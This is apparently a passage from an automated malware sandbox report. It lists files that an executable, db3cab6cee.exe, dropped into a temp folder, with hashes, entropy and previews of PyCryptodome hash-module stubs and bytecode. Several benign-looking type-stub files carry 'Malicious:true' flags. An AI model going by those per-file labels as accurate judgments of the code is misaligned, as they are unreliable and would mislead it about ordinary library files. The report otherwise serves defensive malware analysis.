                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1Ro8s7REYBjvIY3wzRyaRyLu1Ac08UwEW5RwW0WFWXo84WLBh3Ls/y:1RM7CET32rEWAc0/W1WXo8xLB9LMy
                                                                                                                                            MD5:75346EDCB93D820A434DB03BE87622A5
                                                                                                                                            SHA1:47369DC52B3FAD5BF609908FB1AEACE8D87E2E01
                                                                                                                                            SHA-256:7DA8B1DB291F97F8751EBE26AAFB6663571467C4A13827F8114895990E3DD81A
                                                                                                                                            SHA-512:0F1CA6D6FCC2176B6F8FC7849CF5E14C77109CD92C690B81EC796F204ACADF69F3AD444F674EC3D751CAB4A959232F2BAF6D5E65D4BB174B1C5115A8EF413E1B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class Poly1305_MAC(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. r : int,.. s : int,.. data : Buffer) -> None: ..... def update(self, data: Buffer) -> Poly1305_MAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .......def new(key: Buffer,.. cipher: ModuleType,.. nonce: Buffer = ...,.. data: Buffer = ...) -> Poly1305_MAC: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\RIPEMD.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):101
                                                                                                                                            Entropy (8bit):4.504530104701345
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:SbFQZmK2lfvo0NEr3Ssov+7+sv:SbFsmK2lfWr3SsBysv
                                                                                                                                            MD5:947CE7BC169E9EB982967DDD4B64E0B0
                                                                                                                                            SHA1:F32866247F0F60F7872E4201F564EC486F91A2B2
                                                                                                                                            SHA-256:385D71A0A5DA965F3D2EB35F4B206F9451DB73F4541342E095CC3D13CB0CAFFA
                                                                                                                                            SHA-512:6E7BF1A3266F91091FADD86E08D8B73E4B27D411CB67932E03B3C73F4E89450112F3AFF9AF670D3C431C14D28318A3870104247C72145A4D5EF8E726CEBBD424
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# This file exists for backward compatibility with old code that refers to..# Cryptodome.Hash.SHA....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\RIPEMD160.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):535
                                                                                                                                            Entropy (8bit):4.931502616073856
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBjvIY33hUlRypRyLu1AwLsQwu5TUhGLs7Ug4Ls7UdRy5Ryn:1REET3RWQEWAwL/N/L+14L+ywy
                                                                                                                                            MD5:A9429F32C25E1E86987C94D3EE514342
                                                                                                                                            SHA1:176B307242F24A7BFF87D2A74EE609324AD26550
                                                                                                                                            SHA-256:84F643A25DF20E6A761AD4E1ECDC6F04493DB5CCAF6108254B944A31662A00E7
                                                                                                                                            SHA-512:2A7910E7C1091CC7F9F1D4993EF594F77B2E29841A2B64A702A53BFF6C7231B1224A63A9FC979117614547F699A0EA7864A5C622B083617A1AF316CD51AB1B79
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class RIPEMD160Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> RIPEMD160Hash: ..... def new(self, data: Buffer = ...) -> RIPEMD160Hash: .......def new(data: Buffer = ...) -> RIPEMD160Hash: .....digest_size: int..block_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\SHA.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):173
                                                                                                                                            Entropy (8bit):4.729273236802648
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:SbFQZmK2lfvo0NEr3Ssov+7+szJmMymoQpKGOIWufs/96Lf9:SbFsmK2lfWr3SsBysNkmxpdhVs/YLf9
                                                                                                                                            MD5:32205694C19FD9563B36B1B97D677D83
                                                                                                                                            SHA1:5D6E08D713458FB902CB0F20D4CC5ACF61ED6564
                                                                                                                                            SHA-256:583BEF611F4709956AE4271173E91F7DAC236D9DFE8D357095653CD63B870A21
                                                                                                                                            SHA-512:2FBAD71166B6829C10A5B92B4AE199AFABE923EFD3A1741C1EB36DEEF6A5A1F69BE704227E64AAC228DD467DFF44137B57093CE08190D5CA06D62D45B3C0D708
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:# This file exists for backward compatibility with old code that refers to..# Cryptodome.Hash.SHA....from Cryptodome.Hash.SHA1 import __doc__, new, block_size, digest_size..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\SHA1.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7717
                                                                                                                                            Entropy (8bit):5.240550225128664
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:OXykvZ51RUT7NCbEd5SE2NRqv3HRTTaqbQOs6CELRQDDCzS07BrMUcxxxxxxxxxr:O551RC7NiE2P6rbQACEWD25q
                                                                                                                                            MD5:D73BD1F6F2B6A014DFF641D134F4821C
                                                                                                                                            SHA1:897F33033144A3012C128A874819961291C2F0A3
                                                                                                                                            SHA-256:D5630FCD4FC327951D62A72E1B7FA3BB380428DEF89AA614C791F6001E0E7655
                                                                                                                                            SHA-512:09BD3EEB41C0375EDE7AA1B762E352D9F2DC63B2D8735539F9BF09D58DDEF5FF045B9DCB371745E43FB6486BE01A130529AD802506E29214BCCEB3FF60B1A5B6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.T.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d.d...Z.e.j.........Z.e.j.........Z.d...Z.d.S.)......)...*)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Cryptodome.Hash._SHA1a..... #define SHA1_DIGEST_SIZE 20.. int SHA1_init(void **shaState);. int SHA1_destroy(void *shaState);. int SHA1_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA1_digest(const void *shaState,. uint8_t digest[SHA1_DIGEST_SIZE]);. int SHA1_copy(const void *src, void *dst);.. int SHA1_pbkdf2_hmac_assist(const void *inner,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\SHA1.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):555
                                                                                                                                            Entropy (8bit):4.858937300843863
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3vRypRyLu1AGR4Qwu59gR48OR4pRy5Ryn:1REcT3JQEWAczqjUswy
                                                                                                                                            MD5:B35CDD0C45717949B3D05F871CE86E01
                                                                                                                                            SHA1:937CCC519B51BC2AA994CB9F8BD21AAD37865B74
                                                                                                                                            SHA-256:4FC9652243B1B4A443C08C6B22F5C5343C63453405A13FBE9CC9DD12DE6951EA
                                                                                                                                            SHA-512:92E8217DD0C0FA48A33EC261921B5BB6EB385AE47271F2E2E447EFD29279FEE668ECD3A8E910AF34C062CB6CC7CAFE836525CBD93194335F3996FCF78397F69F
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA1Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA1Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA1Hash: .......def new(data: Optional[Buffer] = ...) -> SHA1Hash: .....digest_size: int..block_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\SHA224.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7976
                                                                                                                                            Entropy (8bit):5.212078818986503
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:r/+ykvEyUR7T4a33Ed53j82F73Hqtfi/FbIOs6xLSZdeFKzOthM9xDZYOaxxxxxJ:rbyURf4agzFUfMbIAxuH/FDCOkwww4
                                                                                                                                            MD5:BC2713F30A6ED2D912BB0D1079134C15
                                                                                                                                            SHA1:8568620D3DD31B827A334F6B8300059C7934D840
                                                                                                                                            SHA-256:A192FC3532094335E71F1D411BF0BF94E7E36DC05CDF73D054E4031A6213F992
                                                                                                                                            SHA-512:A2E3755D40EA3B95614045B726D76263B6B3B3C505853AFCB9DAF3E4E9712F52A97A7D882435171EE8593D80085490C81596AB2D23FC12294B714139EB8225D4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d.d...Z.e.j.........Z.e.j.........Z.d...Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Cryptodome.Hash._SHA224a..... int SHA224_init(void **shaState);. int SHA224_destroy(void *shaState);. int SHA224_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA224_digest(const void *shaState,. uint8_t *digest,. size_t digest_size);. int SHA224_copy(const void *src, void *dst);.. int SHA224_pbkdf2_hmac_assist(const void *inner,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\SHA224.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):563
                                                                                                                                            Entropy (8bit):4.8974516866478135
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY36RypRyLu1AGR4Qwu5YgR4vOR40Ry5Ryn:1REcT36QEWAczPsUPwy
                                                                                                                                            MD5:F91615062C7CF8B106319B16A210EDD1
                                                                                                                                            SHA1:6BB2CC5E2BB4140E17A3CB821E84FD8408798AEF
                                                                                                                                            SHA-256:A3FBCEE498C3C4CADC8D5136ACED4C69DE9B941802AEA4AEF8C6B272DF1E054A
                                                                                                                                            SHA-512:305B86FDCA88498DC390D013DF6F8ECE0D47A3E79C7E2855D282A8DDE865EE0914643960F04082D52B906EC5DC0603B5403316D87A03A0E0F89178D8D6108497
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA224Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA224Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA224Hash: .......def new(data: Optional[Buffer] = ...) -> SHA224Hash: .....digest_size: int..block_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\SHA256.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7972
                                                                                                                                            Entropy (8bit):5.225850552859429
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:w/+ykv9XXR6TJDklEd5G0XvP3Hqd1a5bwOs63LSeVleFKzydrMwxDZYOaxxxxxxN:wOXXR8JD2Q41CbwA3uef/0DCOvK
                                                                                                                                            MD5:5AA4A71CFABC3CF7653DA75EAE3B7A5C
                                                                                                                                            SHA1:91C6690F2992F7FC6A1087A2527686D99A0097F9
                                                                                                                                            SHA-256:9C9D243B92D7F78992377CC5EB29BF1C7571320B649DF1E2702444A766061C0E
                                                                                                                                            SHA-512:35CC9EB26C95EFF72D27F0772345DC3C8CF48E28AF1734478B1E6D99687B8A4AFA2DC655EC68A3EC6A049FCC121403C79C6E97DE94BAD9650022E017F0F381E5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d.d...Z.e.j.........Z.e.j.........Z.d...Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Cryptodome.Hash._SHA256a..... int SHA256_init(void **shaState);. int SHA256_destroy(void *shaState);. int SHA256_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA256_digest(const void *shaState,. uint8_t *digest,. size_t digest_size);. int SHA256_copy(const void *src, void *dst);.. int SHA256_pbkdf2_hmac_assist(const void *inner,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\SHA256.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):630
                                                                                                                                            Entropy (8bit):4.955837939042722
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBS55RypRyLXFL1AG7EY3AwNIY3T5Dvg7EY3LCO7EY3LMRy5Ryn:1RENQEXFRAQ/3v3Ts/3+Y/3kwy
                                                                                                                                            MD5:5630B6D27721452497E9BEE7183E9925
                                                                                                                                            SHA1:ACF9207E410A212984F867D9B1FEEEEEDA3C6B86
                                                                                                                                            SHA-256:07892D70C0FA32A19DDA232203BD7FF0D25B19F30E599924836A8D4BB6161A71
                                                                                                                                            SHA-512:1DC45AFC8773B4D797246C6972D9EFD60514C95F8C7AC19FA85D72493E7B92DE2475A2CD0AF5E11152B129E7B6904AC5DD88B378DA9D17749B2C0FD85C9A541D
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional......class SHA256Hash(object):.. digest_size: int.. block_size: int.. oid: str.. def __init__(self, data: Optional[Union[bytes, bytearray, memoryview]]=None) -> None: ..... def update(self, data: Union[bytes, bytearray, memoryview]) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA256Hash: ..... def new(self, data: Optional[Union[bytes, bytearray, memoryview]]=None) -> SHA256Hash: .......def new(data: Optional[Union[bytes, bytearray, memoryview]]=None) -> SHA256Hash: .......digest_size: int..block_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\SHA384.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7972
                                                                                                                                            Entropy (8bit):5.226790353908028
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:t/+ykvV7bRmTlPY5Ed5lsXvr3Hqd5y5bwOs6vLSyVTFKzWwPM9xDZYOaxxxxxxxV:ti7bRAlPtsU5GbwAvuyKODCOv8
                                                                                                                                            MD5:49A95D494B37C45E53DBDC21D39410A1
                                                                                                                                            SHA1:5A811733E94DF001EF3EA37C08A08F2DFF1BD189
                                                                                                                                            SHA-256:4FE7E01664694B2FDD5F848D766F6F8EF1539ECAC0CA001A04969C89035F8ABE
                                                                                                                                            SHA-512:B92F9DA194294C0A1E7DEA58084C6DEE70A868626FBE90B252D29142E80D8376108EA2AAD8C932753D8509A7DB84B05B2997F9D4D31CF7D24EF35E8BAC858EC1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d.d...Z.e.j.........Z.e.j.........Z.d...Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Cryptodome.Hash._SHA384a..... int SHA384_init(void **shaState);. int SHA384_destroy(void *shaState);. int SHA384_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA384_digest(const void *shaState,. uint8_t *digest,. size_t digest_size);. int SHA384_copy(const void *src, void *dst);.. int SHA384_pbkdf2_hmac_assist(const void *inner,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\SHA384.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):563
                                                                                                                                            Entropy (8bit):4.911661278122058
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3RRypRyLu1AGR4Qwu5LgR4+OR47Ry5Ryn:1REcT33QEWAczstU6wy
                                                                                                                                            MD5:33C3A44EFBCBD9A7B7DB7C3E4FA0CF28
                                                                                                                                            SHA1:FCFEFCF1D7DAFBF71741A52550364BDF4813E021
                                                                                                                                            SHA-256:102F8DCEC4B3E3E3E019F6CE2B165C0FDDC41B70EB2E3169270BE35F227F2D5F
                                                                                                                                            SHA-512:A119DC31EADE919C8572205CB2E9865D8C305AFB21CE5A4189885524A82E7086CA1B86103EBCC36398A63FC89D750C3918CDDC18DFB3B9F0DDF6824AACDBBEF8
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA384Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA384Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA384Hash: .......def new(data: Optional[Buffer] = ...) -> SHA384Hash: .....digest_size: int..block_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\SHA3_224.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7093
                                                                                                                                            Entropy (8bit):5.36228005407194
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:E78ykvcDxe5x++aXpd36H08tjYkji7Q8OYOs6zO3p5bV0luISfBwQMnYo9:c/hctjJirOYAzOZYz4BwQMYo9
                                                                                                                                            MD5:CFBD44B47ED438D0D61D76FA0967DFB2
                                                                                                                                            SHA1:276C3056A3FD9C58A85D40483248E85C4B36D074
                                                                                                                                            SHA-256:FEFB57591899696F6BB02EE25AF2ECDEE1CEF249CD21FBCEA114F6E13125F26E
                                                                                                                                            SHA-512:F33F363C0D571FD07DDD6EC2EA5568CB7648A001BFE09C141F86C7D926F193AE6364BC6ABC1897FDBF22D71E39822667F9E19A2C1715D80D148DC8F0D6E6EF36
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................z.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e...............Z.d...Z.e.j.........Z.d.Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptr..c_ubyte)..._raw_keccak_libc.....................D.....e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.S.)...SHA3_224_Hashz.A SHA3-224 hash object.. Do not instantiate directly.. Use the :func:`new` function... :ivar oid: ASN.1 Object ID. :vartype oid: string.. :ivar digest_size: the size in bytes of the resulting hash. :vartype digest_size: integer. .....z.2.16.840.1.101.3.4.2.7....c..........................|.|._.........d.|._.........d.|._.........t.........................}.t...........j.........|.....................................t...........|.j.........d.z.................t...........d.............................}.|.r.t...........d.|.z............

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\SHA3_224.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):624
                                                                                                                                            Entropy (8bit):4.938042917334959
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3uMRRypRyLXFL1AGRT7wNMS5sMVgRkhNMsaLBCUMqRy5Ryn:1REcT3d3QEXFRAcRS5IkhWsaLBwqwy
                                                                                                                                            MD5:AC7852028AC4AED442E756540D27AA6A
                                                                                                                                            SHA1:1281E2F19BCC6041AB8D5E6AE8D6CB75CC408231
                                                                                                                                            SHA-256:AB9ABF3623247F77FDE55038C8531FF4C22E70532CDEF140FA9F0B645A15AC36
                                                                                                                                            SHA-512:DAE8FFCBE304DA6899DF030BA7444F3C87454BFAF774D595BCACDF6B038C8EEAD490D1DA5F7E36735F70EC9612F43F0C3ECE0FE95341F96FB72E0E433D0E4F83
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA3_224_Hash(object):.. digest_size: int.. block_size: int.. oid: str.. def __init__(self, data: Optional[Buffer], update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> SHA3_224_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA3_224_Hash: ..... def new(self, data: Optional[Buffer]) -> SHA3_224_Hash: .......def new(__data: Buffer = ..., update_after_digest: bool = ...) -> SHA3_224_Hash: .......digest_size: int..block_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\SHA3_256.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7093
                                                                                                                                            Entropy (8bit):5.367180156715783
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:E78ykvcDHe5c/+RKpd36H0xtAYkjr7QrOZOs6XO3p/bV0luISfmwQMnYo9:c/0OtAJrQOZAXOZ6z4mwQMYo9
                                                                                                                                            MD5:E16AA1A84C794C9D4D42DCED86B924FA
                                                                                                                                            SHA1:ADCAB7622A2BBE18BEB50316E9AF0D1E0425AD4E
                                                                                                                                            SHA-256:71B11AA4AEA7987024E78C99C4395C82CD06F54A585812B63EDB0D6FBCE4324F
                                                                                                                                            SHA-512:54B03AEA27990665C0B2EA22FA6F5515E2A07FE7495715AEEF1245772DCFD8A2D99F40EAC1A26586217BD3CFB0884E80AB0BDFA7EEC98BE8E77D549CF0A5A79F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................z.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e...............Z.d...Z.e.j.........Z.d.Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptr..c_ubyte)..._raw_keccak_libc.....................D.....e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.S.)...SHA3_256_Hashz.A SHA3-256 hash object.. Do not instantiate directly.. Use the :func:`new` function... :ivar oid: ASN.1 Object ID. :vartype oid: string.. :ivar digest_size: the size in bytes of the resulting hash. :vartype digest_size: integer. . ...z.2.16.840.1.101.3.4.2.8....c..........................|.|._.........d.|._.........d.|._.........t.........................}.t...........j.........|.....................................t...........|.j.........d.z.................t...........d.............................}.|.r.t...........d.|.z............

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\SHA3_256.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):624
                                                                                                                                            Entropy (8bit):4.9540685583606
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3uBRypRyLXFL1AGRT7wNC5slgRkhNcaLBCU6Ry5Ryn:1REcT3mQEXFRAc9rkh6aLB+wy
                                                                                                                                            MD5:7B1F16C4E7038211DB89A5FA930FA0EE
                                                                                                                                            SHA1:DD49BD9504AFCB162C3589155FA01D521A768600
                                                                                                                                            SHA-256:7EEF366E028519327074AADF07FEF65FD87564DEAE82A1DE1E03634A928047AB
                                                                                                                                            SHA-512:6155A0F2DD3D2DF8F7E0002AFC1EE7877917AA7094EF7D1DBB0F0DEABCD44BECB498C5C0998186C2E09F1C394BF74DE6C526054D42A78D2F552A6E67C062E58C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA3_256_Hash(object):.. digest_size: int.. block_size: int.. oid: str.. def __init__(self, data: Optional[Buffer], update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> SHA3_256_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA3_256_Hash: ..... def new(self, data: Optional[Buffer]) -> SHA3_256_Hash: .......def new(__data: Buffer = ..., update_after_digest: bool = ...) -> SHA3_256_Hash: .......digest_size: int..block_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\SHA3_384.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7311
                                                                                                                                            Entropy (8bit):5.344312071663393
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:98ykvye5Tj+Nupd36H0NtAYkjw7Q8OAOs6oO3puEpizb6lTISfZwQMnYDi9:9LCtAJw/OAAoOZ7izeC4ZwQMYDi9
                                                                                                                                            MD5:8C210C3A734F7F89784395E0651413A0
                                                                                                                                            SHA1:E633DC4B1896CACD542D6718418FA3BE93E77222
                                                                                                                                            SHA-256:6D497FD8D30A670586DA4FB8A944337D0585135CD7E1DE9DFE8F64CF994CD983
                                                                                                                                            SHA-512:D39E099A8BD9243DE92642ACABF87FE2AA14F6491471350CAF673953091E35966AA2E46C16DD844D4999F781507F4EF8C01972FA3CCE3226FE1DF6BB6E6D73C9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eA.........................z.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e...............Z.d...Z.e.j.........Z.d.Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptr..c_ubyte)..._raw_keccak_libc.....................L.....e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.S.)...SHA3_384_Hashz.A SHA3-384 hash object.. Do not instantiate directly.. Use the :func:`new` function... :ivar oid: ASN.1 Object ID. :vartype oid: string.. :ivar digest_size: the size in bytes of the resulting hash. :vartype digest_size: integer. .0...z.2.16.840.1.101.3.4.2.9.h...c..........................|.|._.........d.|._.........d.|._.........t.........................}.t...........j.........|.....................................t...........|.j.........d.z.................t...........d.............................}.|.r.t...........d.|.z....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\SHA3_384.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
